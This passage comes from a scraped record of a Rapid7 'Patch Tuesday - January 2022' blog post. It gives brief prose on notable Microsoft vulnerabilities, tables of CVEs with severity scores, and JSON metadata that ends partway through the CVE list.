\u201cwormable\u201d by Microsoft, similar vulnerabilities have not proven to be rampantly exploited (see the AttackerKB analysis for [CVE-2021-31166](<https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166/rapid7-analysis>)).\n\nNot quite as bad is [CVE-2022-21840](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21840>), which affects all supported versions of Office, as well as Sharepoint Server. Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website \u2013 thankfully the Windows preview pane is not a vector for this attack.\n\n[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>) affects Exchange Server, but cannot be exploited directly over the public internet (attackers need to be \u201cadjacent\u201d to the target system in terms of network topology). This restriction also applies to [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>) and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), two less severe RCEs in Exchange this month.\n\n[CVE-2022-21912](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21912>) and [CVE-2022-21898](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21898>) both affect DirectX Graphics and require local access. [CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) is a vulnerability in the Windows Codecs library. In most cases, systems should automatically get patched; however, some organizations may have the vulnerable codec preinstalled on their gold images and disable Windows Store updates.\n\nDefenders should prioritize patching servers (Exchange, Sharepoint, Hyper-V, and IIS) followed by web browsers and other client software.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Browser vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21930>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21931>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21929>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 2.5 | Yes \n[CVE-2022-21954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21954>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-21970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21970>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-0120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0120>) | Chromium: CVE-2022-0120 Inappropriate implementation in Passwords | No | No | nan | Yes \n[CVE-2022-0118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0118>) | Chromium: CVE-2022-0118 Inappropriate implementation in WebShare | No | No | nan | Yes \n[CVE-2022-0117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0117>) | Chromium: CVE-2022-0117 Policy bypass in Service Workers | No | No | nan | Yes \n[CVE-2022-0116](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0116>) | Chromium: CVE-2022-0116 Inappropriate implementation in Compositing | No | No | nan | Yes \n[CVE-2022-0115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0115>) | Chromium: CVE-2022-0115 Uninitialized Use in File API | No | No | nan | Yes \n[CVE-2022-0114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0114>) | Chromium: CVE-2022-0114 Out of bounds memory access in Web Serial | No | No | nan | Yes \n[CVE-2022-0113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0113>) | Chromium: CVE-2022-0113 Inappropriate implementation in Blink | No | No | nan | Yes \n[CVE-2022-0112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0112>) | Chromium: CVE-2022-0112 Incorrect security UI in Browser UI | No | No | nan | Yes \n[CVE-2022-0111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0111>) | Chromium: CVE-2022-0111 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0110>) | Chromium: CVE-2022-0110 Incorrect security UI in Autofill | No | No | nan | Yes \n[CVE-2022-0109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0109>) | Chromium: CVE-2022-0109 Inappropriate implementation in Autofill | No | No | nan | Yes \n[CVE-2022-0108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0108>) | Chromium: CVE-2022-0108 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0107>) | Chromium: CVE-2022-0107 Use after free in File Manager API | No | No | nan | Yes \n[CVE-2022-0106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0106>) | Chromium: CVE-2022-0106 Use after free in Autofill | No | No | nan | Yes \n[CVE-2022-0105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0105>) | Chromium: CVE-2022-0105 Use after free in PDF | No | No | nan | Yes \n[CVE-2022-0104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0104>) | Chromium: CVE-2022-0104 Heap buffer overflow in ANGLE | No | No | nan | Yes \n[CVE-2022-0103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0103>) | Chromium: CVE-2022-0103 Use after free in SwiftShader | No | No | nan | Yes \n[CVE-2022-0102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0102>) | Chromium: CVE-2022-0102 Type Confusion in V8 | No | No | nan | Yes \n[CVE-2022-0101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0101>) | Chromium: CVE-2022-0101 Heap buffer overflow in Bookmarks | No | No | nan | Yes \n[CVE-2022-0100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0100>) | Chromium: CVE-2022-0100 Heap buffer overflow in Media streams API | No | No | nan | Yes \n[CVE-2022-0099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0099>) | Chromium: CVE-2022-0099 Use after free in Sign-in | No | No | nan | Yes \n[CVE-2022-0098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0098>) | Chromium: CVE-2022-0098 Use after free in Screen Capture | No | No | nan | Yes \n[CVE-2022-0097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0097>) | Chromium: CVE-2022-0097 Inappropriate implementation in DevTools | No | No | nan | Yes \n[CVE-2022-0096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0096>) | Chromium: CVE-2022-0096 Use after free in Storage | No | No | nan | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21911>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21924>) | Workstation Service Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21834](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21834>) | Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21919>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | No \n[CVE-2022-21885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21885>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21914>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21920>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21908>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21843](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21843>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21883>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21848>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21889>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21890>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21900>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21905>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21880>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21915>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-21904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21904>) | Windows GDI Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21903>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21899>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21916>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21897>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21838>) | Windows Cleanup Manager Elevation of Privilege Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21836>) | Windows Certificate Spoofing Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2022-21925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21925>) | Windows BackupKey Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21862>) | Windows Application Model Core API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21859>) | Windows Accounts Control Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>) | Virtual Machine IDE Drive Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21922](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21922>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21893>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21850](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21850>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21851](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21851>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21835>) | Microsoft Cryptographic Services Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21884>) | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21913>) | Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass | No | No | 5.3 | No \n[CVE-2022-21857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21857>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21846>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21969>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n \n### Microsoft Dynamics vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21932>) | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | No | No | 7.6 | No \n[CVE-2022-21891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21891>) | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | No | No | 7.6 | No \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21842](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21842>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21837>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-21840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21840>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21841>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21895>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21864>) | Windows UI Immersive Server API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21866>) | Windows System Launcher Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21875>) | Windows Storage Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21863>) | Windows StateRepository API Server file Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21874>) | Windows Security Center API Remote Code Execution Vulnerability | No | Yes | 7.8 | No \n[CVE-2022-21892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21892>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21958>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21959>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21960>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21961>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21962>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21963>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.4 | Yes \n[CVE-2022-21928](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21928>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.3 | Yes \n[CVE-2022-21867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21867>) | Windows Push Notifications Apps Elevation Of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21888>) | Windows Modern Execution Server Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21881>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21879>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 5.5 | No \n[CVE-2022-21849](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21849>) | Windows IKE Extension Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21901>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 9 | Yes \n[CVE-2022-21847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21847>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21878>) | Windows Geolocation Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21839>) | Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability | No | Yes | 6.1 | No \n[CVE-2022-21868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21868>) | Windows Devices Human Interface Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21921>) | Windows Defender Credential Guard Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21906>) | Windows Defender Application Control Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21852>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21902>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21896>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21858>) | Windows Bind Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21860>) | Windows AppContracts API Server Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21876>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21882>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21887>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21873>) | Tile Data Repository Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21861>) | Task Flow Data Engine Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21870>) | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21877>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21894>) | Secure Boot Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21964>) | Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-22947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-22947>) | Open Source Curl Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21871>) | Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21910>) | Microsoft Cluster Port Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36976>) | Libarchive Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21907>) | HTTP Protocol Stack Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21918>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21865>) | Connected Devices Platform Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21869>) | Clipboard User Service Elevation of Privilege Vulnerability | No | No | 7 | No", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T21:41:56", "type": "rapid7blog", "title": "Patch Tuesday - January 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21907", "CVE-2021-22947", "CVE-2021-31166", "CVE-2021-36976", "CVE-2022-0096", "CVE-2022-0097", "CVE-2022-0098", "CVE-2022-0099", "CVE-2022-0100", "CVE-2022-0101", "CVE-2022-0102", "CVE-2022-0103", "CVE-2022-0104", "CVE-2022-0105", "CVE-2022-0106", "CVE-2022-0107", "CVE-2022-0108", "CVE-2022-0109", "CVE-2022-0110", "CVE-2022-0111", "CVE-2022-0112", "CVE-2022-0113", "CVE-2022-0114", "CVE-2022-0115", "CVE-2022-0116", "CVE-2022-0117", "CVE-2022-0118", "CVE-2022-0120", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21837", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21841", "CVE-2022-21842", "CVE-2022-21843", "CVE-2022-21846", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21891", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21929", 